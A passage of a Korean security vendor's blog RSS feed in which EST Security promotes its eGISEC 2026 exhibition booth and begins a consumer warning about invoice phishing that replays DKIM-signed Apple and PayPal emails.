&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Frame 35.png&quot; data-origin-width=&quot;480&quot; data-origin-height=&quot;70&quot;&gt;&lt;a href=&quot;https://bit.ly/4nsdIJE&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bfRwU9/dJMcacWvThx/uwBr3kb17mK3f8weFhjXnK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbfRwU9%2FdJMcacWvThx%2FuwBr3kb17mK3f8weFhjXnK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;350&quot; height=&quot;51&quot; data-filename=&quot;Frame 35.png&quot; data-origin-width=&quot;480&quot; data-origin-height=&quot;70&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>기업데이터보안</category>
      <category>기업문서관리</category>
      <category>기업보안솔루션</category>
      <category>내부정보유출방지</category>
      <category>문서관리</category>
      <category>인터넷디스크</category>
      <category>재택근무보안</category>
      <category>클라우드스토리지</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5733</guid>
      <comments>https://alyacofficialblog.tistory.com/5733#entry5733comment</comments>
      <pubDate>Tue, 3 Mar 2026 18:45:52 +0900</pubDate>
    </item>
    <item>
      <title>[이벤트] 이스트시큐리티, eGISEC 2026 참가! - 우리 기관 보안, 이제는 현장에서 직접 점검해보세요.</title>
      <link>https://alyacofficialblog.tistory.com/5732</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이스트시큐리티가 오는 2026년 3월 18일(수)부터 20일(금)까지 KINTEX 제1전시장에서 개최되는 &lt;b&gt;eGISEC 2026 전자정부 정보보호 솔루션 페어&lt;/b&gt;에 참가합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이번 행사에서는 공공기관 및 기업 환경에 최적화된 엔드포인트 보안, 문서 보안, AI 보안까지 한 자리에서 직접 확인하실 수 있습니다. 단순 제품 소개를 넘어, 실제 운영 환경을 고려한 보안 체계 점검과 대응 전략을 제시해 드립니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;2191&quot; data-origin-height=&quot;1687&quot;&gt;&lt;a href=&quot;https://bit.ly/4s4eFKY&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/d2hRZd/dJMcaaqPHiv/hx0bCh7dX6aod8HkeOCk8k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fd2hRZd%2FdJMcaaqPHiv%2Fhx0bCh7dX6aod8HkeOCk8k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;800&quot; height=&quot;1095&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;2191&quot; data-origin-height=&quot;1687&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #f8f9fa; color: #495057; text-align: start;&quot;&gt;  eGISEC 2026 &amp;ndash; KINTEX 제1전시장&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #f8f9fa; color: #495057; text-align: start;&quot;&gt;&lt;span style=&quot;background-color: #f8f9fa; color: #495057; text-align: start;&quot;&gt;  2026.03.18(수) &amp;ndash; 03.20(금)&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최근 보안 위협은 단일 제품으로 대응하기 어려운 구조로 진화하고 있습니다. 랜섬웨어의 고도화, 내부자 유출 사고, 취약점 기반 침해 공격 등 복합적인 리스크가 동시에 발생하고 있기 때문입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;alter (1) 2 (1).png&quot; data-origin-width=&quot;2259&quot; data-origin-height=&quot;3060&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/UB2Vj/dJMcac3cLWD/Utbk15ERqJsYfKF1iWRIOk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/UB2Vj/dJMcac3cLWD/Utbk15ERqJsYfKF1iWRIOk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/UB2Vj/dJMcac3cLWD/Utbk15ERqJsYfKF1iWRIOk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FUB2Vj%2FdJMcac3cLWD%2FUtbk15ERqJsYfKF1iWRIOk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;800&quot; height=&quot;1084&quot; data-filename=&quot;alter (1) 2 (1).png&quot; data-origin-width=&quot;2259&quot; data-origin-height=&quot;3060&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;행사 기간 동안 이스트시큐리티 부스 (#P041) 에서는 엔드포인트 보안, 문서 보안, 그리고 기업 AI 보안(LLM) 솔루션을 직접 시연하며, 실제 운영 환경을 고려한 보안 체계를 현장에서 확인하실 수 있습니다. 변화하는 위협 환경에 대응하기 위한 실질적인 보안 전략과 적용 방안을 구체적으로 안내해드립니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;또한 참여형 타임 이벤트와 함께 기업&amp;middot;기관별 보안 환경을 점검하는 맞춤형 컨설팅도 제공합니다. 현장에서 도입 방향과 단계별 적용 전략까지 상세히 안내해드릴 예정이니, 이스트시큐리티 부스를 방문하시어 귀사의 보안 체계를 직접 점검해 보시기 바랍니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;사전 예약 이벤트&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;보안 담당자라면, 이번 기회에 단순 정보 수집이 아닌 실질적인 보안 체계 점검과 개선 방향까지 확인해보세요!&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;351&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/eHOHyG/dJMcafr7KTe/6xqxEG4TdKZuj8uB908V81/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/eHOHyG/dJMcafr7KTe/6xqxEG4TdKZuj8uB908V81/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/eHOHyG/dJMcafr7KTe/6xqxEG4TdKZuj8uB908V81/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FeHOHyG%2FdJMcafr7KTe%2F6xqxEG4TdKZuj8uB908V81%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;800&quot; height=&quot;1095&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;351&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;✔ 대기 없이 즉시 상담 가능&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;✔ 기관 맞춤형 보안 점검 자료 사전 준비&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;✔ 도입 검토 시 PoC 및 기술 지원 우선 제공&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;✔&lt;span&gt; 현장 상담 고객 한정 프로모션 혜택 증정&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;현장 상담 고객 한정 프로모션&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;eGISEC 2026 현장에서 상담 후 신규 도입 시, 추가 도입 인센티브를 별도 제공해드립니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;보안은 빠르게 결정할수록 유리합니다.&lt;span&gt;&amp;nbsp;&lt;/span&gt;현장에서 직접 확인하고 가장 좋은 조건으로 도입하세요.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p style=&quot;margin: 0; color: #212529;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;✔ &lt;/span&gt;신규 도입 시, 도입 금액 200만원당 Alan Works 계정 1개 제공 (1년 사용)&lt;/p&gt;
&lt;p style=&quot;margin: 0; color: #212529;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;✔ &lt;/span&gt;구매 금액별 프리미엄 경품 증정&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Frame 485146.png&quot; data-origin-width=&quot;837&quot; data-origin-height=&quot;138&quot;&gt;&lt;a href=&quot;https://bit.ly/4s4eFKY&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/lHRaM/dJMcajnHsq8/QeUkVeavRck5KQiX8Taf11/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FlHRaM%2FdJMcajnHsq8%2FQeUkVeavRck5KQiX8Taf11%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;800&quot; height=&quot;132&quot; data-filename=&quot;Frame 485146.png&quot; data-origin-width=&quot;837&quot; data-origin-height=&quot;138&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;945&quot; data-origin-height=&quot;814&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b23xjJ/dJMcad2bhbq/EjsRNNKpD8dEZk9uG4abF1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b23xjJ/dJMcad2bhbq/EjsRNNKpD8dEZk9uG4abF1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b23xjJ/dJMcad2bhbq/EjsRNNKpD8dEZk9uG4abF1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb23xjJ%2FdJMcad2bhbq%2FEjsRNNKpD8dEZk9uG4abF1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;800&quot; height=&quot;689&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;945&quot; data-origin-height=&quot;814&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;이런 기관이라면 꼭 방문하세요!&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎ &lt;/span&gt;내부 자료 유출 리스크를 관리해야 하는 공공기관&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎ &lt;/span&gt;랜섬웨어 대응 체계를 재정비 중인 기업&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;VPN 기반 원격 접속 보안에 한계를 느끼는 조직&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;취약점 관리 및 패치 관리 자동화가 필요한 환경&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;생성형 AI 도입은 필요하지만 보안이 우려되는 기업&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;보안 재정비가 필요하지만 예산이 고민인 기업&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;타사 백신 사용 중 계약 만료가 다가오는 기업&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;alter (1) 3 (1).png&quot; data-origin-width=&quot;2259&quot; data-origin-height=&quot;1581&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/coqJ1v/dJMcaiWEafK/oQBfltdpq44rvNtSEFPMK0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/coqJ1v/dJMcaiWEafK/oQBfltdpq44rvNtSEFPMK0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/coqJ1v/dJMcaiWEafK/oQBfltdpq44rvNtSEFPMK0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcoqJ1v%2FdJMcaiWEafK%2FoQBfltdpq44rvNtSEFPMK0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;800&quot; height=&quot;560&quot; data-filename=&quot;alter (1) 3 (1).png&quot; data-origin-width=&quot;2259&quot; data-origin-height=&quot;1581&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Frame 485146.png&quot; data-origin-width=&quot;837&quot; data-origin-height=&quot;138&quot;&gt;&lt;a href=&quot;https://bit.ly/4s4eFKY&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/lJGZm/dJMcafZWfD0/HpYLpPYcwU9aZ78YOumAw1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FlJGZm%2FdJMcafZWfD0%2FHpYLpPYcwU9aZ78YOumAw1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;800&quot; height=&quot;132&quot; data-filename=&quot;Frame 485146.png&quot; data-origin-width=&quot;837&quot; data-origin-height=&quot;138&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;figure data-ke-type=&quot;image&quot; data-ke-style=&quot;alignCenter&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; data-link=&quot;https://egisec.imasia-passport.com/ko/user/register&quot; data-link-islinknewwindow=&quot;true&quot;&gt;
&lt;figcaption style=&quot;display: none;&quot;&gt;&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;지금 바로 현장 상담을 사전 예약하시고, 실제 도입 관점에서의 보안 체계를 점검해보시기 바랍니다. 보안은 정보가 아니라, 실행 전략입니다. 이번 eGISEC 이스트시큐리티 부스에서 그 해답을 확인해보세요!&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://exhibitors.informamarkets-info.com/event/2026SEC/ko-KR/exhibitor/447046/estsecurity&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;이스트시큐리티 디지털 쇼룸 바로가기&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>100%경품증정</category>
      <category>AI보안</category>
      <category>eGISEC2026</category>
      <category>기업보안</category>
      <category>데이터보안</category>
      <category>문서보안</category>
      <category>엔드포인트보안</category>
      <category>이벤트</category>
      <category>이스트시큐리티</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5732</guid>
      <comments>https://alyacofficialblog.tistory.com/5732#entry5732comment</comments>
      <pubDate>Wed, 25 Feb 2026 13:42:44 +0900</pubDate>
    </item>
    <item>
      <title>&amp;ldquo;애플&amp;middot;페이팔 메일도 믿을 수 없다&amp;rdquo; DKIM 리플레이 공격으로 진화한 송장 피싱 주의</title>
      <link>https://alyacofficialblog.tistory.com/5729</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;최근 애플과 페이팔 같은 글로벌 결제 플랫폼의&amp;nbsp;결제 요청서(Invoice)&amp;middot;분쟁 알림&amp;nbsp;기능을 악용한 신종 피싱 공격이 전 세계적으로 확산되고 있습니다. 이 공격은 정상 플랫폼에서 실제로 발송된 이메일을 그대로 재활용하는 방식으로, 기존 이메일 인증 체계(SPF&amp;middot;DKIM&amp;middot;DMARC)를 교묘히 우회한다는 점에서 각별한 주의가 필요합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;해외 보안 매체 Cyber Security News 등 다수의 보안 리포트에 따르면, 공격자는 먼저 애플이나 페이팔에 가짜 판매자 계정을 생성한 뒤, 해당 플랫폼의 &amp;lsquo;결제 요청&amp;rsquo; 또는 &amp;lsquo;거래 취소 요청&amp;rsquo; 기능을 이용해 자신에게 인보이스 메일을 발송합니다. 이후 이렇게 받은&amp;nbsp;정상 메일을 그대로 다수의 피해자에게 재전송(리플레이)함으로써, 사용자가 플랫폼에서 온 공식 결제 안내로 믿도록 유도합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
